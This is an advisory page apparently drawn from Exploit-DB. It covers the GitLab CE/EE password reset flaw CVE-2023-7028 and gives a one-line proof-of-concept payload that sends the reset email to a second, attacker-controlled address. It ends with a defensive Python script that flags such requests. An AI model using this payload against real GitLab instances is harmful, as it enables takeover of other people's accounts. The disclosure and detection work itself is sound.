Vendor: GitLab CE/EE
By: Sebastian Kriesten
CVSS: 6.1 (HIGH)
Password Reset Vulnerability
CWE: 862
Product Name: GitLab CE/EE
Affected Version From: GitLab CE/EE < 16.7.2, < 16.6.4, < 16.5.6
Affected Version To: 16.7.1 and below
Patch Exists: YES
Related CVE: CVE-2023-7028
CPE: a:gitlab:gitlab
Platforms Tested:
2024

GitLab CE/EE < 16.7.2 - Password Reset

The vulnerability in GitLab CE/EE versions prior to 16.7.2 allows an attacker to perform a password reset on a user account without proper authorization. This could lead to unauthorized access to user accounts.

Mitigation:

To mitigate this vulnerability, users are advised to update GitLab CE/EE to version 16.7.2 or later.

Exploit-DB raw data:

# Exploit Title: GitLab CE/EE < 16.7.2 - Password Reset
# Exploit Author: Sebastian Kriesten (0xB455)
# Twitter: https://twitter.com/0xB455

# Date: 2024-01-12
# Vendor Homepage: gitlab.com
# Vulnerability disclosure: https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
# Version: <16.7.2, <16.6.4, <16.5.6
# CVE: CVE-2023-7028

Proof of Concept:
user[email][]=valid@email.com&user[email][]=attacker@email.com
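
A defender-side check for the parameter shape shown in the proof of concept, added here as an example (it is not part of the Exploit-DB entry or of GitLab's code): it classifies form-encoded password reset request bodies and flags any that name more than one address. The scalar key `user[email]`, the verdict names and the sample records are assumptions constructed for illustration.

```python
from urllib.parse import parse_qsl

ARRAY_KEY = "user[email][]"   # array-style key, as in the PoC on this page
SCALAR_KEY = "user[email]"    # assumed key of a normal single-address reset form


def classify_reset_body(body: str) -> str:
    """Classify a form-encoded password reset body.

    Returns "multi-recipient" when more than one distinct address is supplied,
    "array-single" when the array form carries one address, otherwise "ok".
    """
    # parse_qsl percent-decodes keys, so user%5Bemail%5D%5B%5D matches as well.
    pairs = parse_qsl(body, keep_blank_values=True)
    array_vals = [v.strip().lower() for k, v in pairs if k == ARRAY_KEY]
    scalar_vals = [v.strip().lower() for k, v in pairs if k == SCALAR_KEY]
    distinct = {v for v in array_vals + scalar_vals if v}
    if len(distinct) > 1:
        return "multi-recipient"
    if array_vals:
        return "array-single"
    return "ok"


def scan(records):
    """Return (source, verdict) for every record whose verdict is not "ok"."""
    hits = []
    for source, body in records:
        verdict = classify_reset_body(body)
        if verdict != "ok":
            hits.append((source, verdict))
    return hits


# Constructed sample request bodies (not real traffic); all values are placeholders.
SAMPLE = [
    ("198.51.100.7", "user[email]=alice@example.com"),
    ("203.0.113.9", "user[email][]=alice@example.com&user[email][]=other@example.net"),
    ("203.0.113.9", "user%5Bemail%5D%5B%5D=bob@example.com&user%5Bemail%5D%5B%5D=other@example.net"),
    ("198.51.100.8", "user[email][]=carol@example.com"),
    ("198.51.100.8", "user[email][]=Dan@example.com&user[email][]=dan@example.com"),
]

if __name__ == "__main__":
    for source, verdict in scan(SAMPLE):
        print(source, verdict)
```

Feed it the request bodies captured by a reverse proxy or WAF for the password reset form; a "multi-recipient" verdict on an instance that has not yet been updated to a fixed release warrants reviewing the targeted account.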